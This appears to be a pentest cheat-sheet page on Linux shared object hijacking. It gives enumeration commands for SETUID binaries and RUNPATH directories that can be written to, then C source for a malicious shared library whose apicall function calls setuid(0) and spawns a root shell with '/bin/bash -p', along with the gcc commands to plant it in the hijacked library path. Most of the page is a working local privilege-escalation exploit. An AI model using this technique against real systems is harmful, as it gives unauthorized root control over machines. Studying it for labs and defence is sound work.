Skip to main content

Shared Object Hijacking

Shared Object Hijacking is an attack where malicious shared libraries are injected into programs that load shared libraries from non-standard locations.

If a program uses a custom library or relies on libraries that can be hijacked, the attacker can exploit this to gain elevated privileges.

Key Concepts:

  • SETUID Binaries: Programs with SETUID flag set can be executed with the privileges of the file owner (often root), enabling privilege escalation if hijacked.
  • LD_LIBRARY_PATH / RUNPATH: Environment variables or program configurations that specify where shared libraries should be loaded from. If a program loads libraries from writable directories, those can be hijacked.

Enumeration

find / -type f -perm -4000 2>/dev/null

# List Shared Libraries Used by the Binary
ldd employee_manager ## here 'employee_manager' is the binary name

## Use readelf to inspect the binary's RUNPATH or RPATH.
# This will show if a non-standard folder is being used to load libraries.
readelf -d employee_manager | grep PATH

# From above output, we can check if it's writable directory
ls -la /custom/libs/

Exploitation

## can create and inject a malicious shared object to escalate privileges.

## Now, we need to Identify the required function that the binary calls from the
## shared library (e.g., apicall).

## To identify the function name, we can create a fake libshared.so function and
## compile it as .so object file like below:
```C
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

void invalidFunction() {
    printf("R3zy/D3v");
}
```

## Compile it using following:
gcc fake.c -fPIC -shared -o /custom/libs/libshared.so

## Once we find the valid function name, we can again make a file src.c with that
## function name that summons root shell like below
```C
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

void apicall() {
    printf("Root Shell Summoned! Yay\n");
    setuid(0);              // Set user ID to root
    system("/bin/bash -p"); // Spawn a root shell
}
```

# Compile the malicious C code into a shared object (.so).
gcc src.c -fPIC -shared -o /custom/libs/libshared.so

## Now that the malicious library is in place, run the vulnerable binary
## (employee_manager). The binary will load the hijacked library and execute the
## malicious apicall function.